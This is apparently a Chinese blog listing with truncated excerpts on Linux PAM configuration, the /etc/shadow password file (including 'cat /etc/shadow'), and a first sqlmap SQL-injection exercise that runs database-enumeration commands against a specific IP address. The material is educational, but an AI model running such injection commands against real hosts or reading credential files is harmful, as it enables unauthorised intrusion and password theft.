摘要: [root@localhost rooto]# cat /etc/pam.d/system-auth # Generated by authselect on Thu Apr 8 04:12:37 2021 # Do not modify this file manually. auth requi 阅读全文
posted @ 2021-04-19 14:16 雨中的蜗牛 阅读(2080) 评论(0) 推荐(0)
摘要: cat /etc/shadow /etc/shadow 文件,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。 /etc/shadow 文件,只有 root 用户拥有读取权限,其他用户没有任何权限,这样就保证了用户密码的安全性。 文件中每行代表一个用户,使用 ":" 作为分隔符,每行 阅读全文
posted @ 2021-04-19 10:59 雨中的蜗牛 阅读(2101) 评论(0) 推荐(0)
摘要: 第一次sql注入 1.在sqlmap文件安装目录下输入打开cmd,输入: sqlmap.py 2. sqlmap.py -u url(url:目标地址) sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 –dbs sqlmap.py -u h 阅读全文
posted @ 2021-04-09 16:55 雨中的蜗牛 阅读(80) 评论(0) 推荐(0)